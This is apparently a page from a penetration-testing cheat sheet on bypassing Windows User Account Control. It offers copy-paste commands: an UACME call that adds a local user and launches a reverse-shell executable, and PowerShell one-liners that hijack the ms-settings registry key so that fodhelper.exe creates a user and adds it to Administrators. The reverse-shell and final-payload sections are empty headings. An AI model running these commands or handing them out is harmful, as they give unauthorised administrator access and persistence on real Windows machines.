UAC Bypass

Common UAC Bypass Checklists

A UAC bypass is a method to circumvent User Account Control, a security feature in Windows that asks for confirmation before making major changes. Bypasses typically trick trusted programs into running malicious code with high privileges.

UACME

# Add new user
Akagi64.exe 61 "net user asuka asuk@1337 /add"
# Reverse shell
Akagi64.exe 61 "E:\Exploits\shell.exe"

Fodhelper

Run at Powershell.

  • Add New Administrator

# Add user "asuka"
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force; New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force; Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "net user asuka asuk@1337 /add" -Force; Start-Process "C:\Windows\System32\fodhelper.exe"
# Add asuka to Local Administrator
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force; New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force; Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "net localgroup Administrators asuka /add" -Force; Start-Process "C:\Windows\System32\fodhelper.exe"

# Delete registry value
reg delete HKCU\Software\Classes\ms-settings\ /f

  • Reverse shell

reverse-shell.ps1

Convert to Base64 with UTF-16LE char encode.

Final Fodhelper payload:

Delete registry value after command executed:

Slui File Handler Hijack LPE

PreviousUnquoted Service PathNextToken Abuse

Last updated

Was this helpful?